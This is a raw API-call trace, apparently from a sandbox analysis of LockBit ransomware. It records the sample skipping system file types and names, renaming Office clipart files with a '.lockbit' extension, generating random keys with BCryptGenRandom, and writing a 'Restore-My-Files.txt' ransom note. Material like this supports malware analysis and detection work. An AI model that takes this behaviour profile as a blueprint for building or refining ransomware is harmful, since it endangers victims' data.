ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x23c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099179.WMF", cAlternateFileName="")) returned 1 [0122.895] lstrcmpiW (lpString1=".", lpString2="J0099179.WMF") returned -1 [0122.895] lstrcmpiW (lpString1="..", lpString2="J0099179.WMF") returned -1 [0122.895] PathFindExtensionW (pszPath="J0099179.WMF") returned=".WMF" [0122.895] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0122.895] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0122.895] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0122.895] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0122.895] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0122.895] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0122.895] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0122.895] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0122.895] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0122.895] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0122.895] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0122.895] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0122.896] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0122.896] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099179.WMF") returned 1 [0122.897] lstrcmpiW (lpString1="ntldr", lpString2="J0099179.WMF") returned 1 [0122.897] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099179.WMF") returned 1 [0122.897] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099179.WMF") returned -1 [0122.897] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099179.WMF") returned -1 [0122.897] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099179.WMF") returned 1 [0122.897] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099179.WMF") returned -1 [0122.897] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0122.897] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF") returned=".WMF" [0122.897] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0122.897] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0122.897] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0122.898] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0122.898] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF.lockbit") returned 72 [0122.898] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099179.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0122.899] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0122.899] malloc (_Size=0x40068) returned 0x3df0008 [0122.899] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9154) returned 1 [0122.899] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0122.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0122.901] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0123.722] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0123.722] malloc (_Size=0xa6) returned 0x77d7a8 [0123.722] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0123.949] free (_Block=0x77d7a8) [0123.949] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099179.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0123.949] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0123.950] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0123.950] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0xd42, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099180.WMF", cAlternateFileName="")) returned 1 [0123.950] lstrcmpiW (lpString1=".", lpString2="J0099180.WMF") returned -1 [0123.950] lstrcmpiW (lpString1="..", lpString2="J0099180.WMF") returned -1 [0123.950] PathFindExtensionW (pszPath="J0099180.WMF") returned=".WMF" [0123.950] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0123.950] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0123.951] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0123.951] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099180.WMF") returned 1 [0123.951] lstrcmpiW (lpString1="ntldr", lpString2="J0099180.WMF") returned 1 [0123.951] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099180.WMF") returned 1 [0123.951] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099180.WMF") returned -1 [0123.951] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099180.WMF") returned -1 [0123.951] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099180.WMF") returned 1 [0123.951] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099180.WMF") returned -1 [0123.952] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0123.952] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF") returned=".WMF" [0123.952] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0123.952] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0123.952] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0123.953] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF.lockbit") returned 72 [0123.953] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099180.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0123.953] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0123.953] malloc (_Size=0x40068) returned 0x3df0008 [0123.953] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3394) returned 1 [0123.953] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0123.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0123.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0123.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0123.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0123.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0123.955] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0124.036] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.036] malloc (_Size=0xa6) returned 0x77d7a8 [0124.036] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0124.036] free (_Block=0x77d7a8) [0124.036] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099180.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.036] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.037] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.037] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x4ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099181.WMF", cAlternateFileName="")) returned 1 [0124.037] lstrcmpiW (lpString1=".", lpString2="J0099181.WMF") returned -1 [0124.037] lstrcmpiW (lpString1="..", lpString2="J0099181.WMF") returned -1 [0124.037] PathFindExtensionW (pszPath="J0099181.WMF") returned=".WMF" [0124.037] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0124.037] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0124.038] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0124.038] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099181.WMF") returned 1 [0124.038] lstrcmpiW (lpString1="ntldr", lpString2="J0099181.WMF") returned 1 [0124.038] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099181.WMF") returned 1 [0124.038] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099181.WMF") returned -1 [0124.039] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099181.WMF") returned -1 [0124.039] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099181.WMF") returned 1 [0124.039] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099181.WMF") returned -1 [0124.039] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.039] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned=".WMF" [0124.039] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0124.039] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0124.039] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") 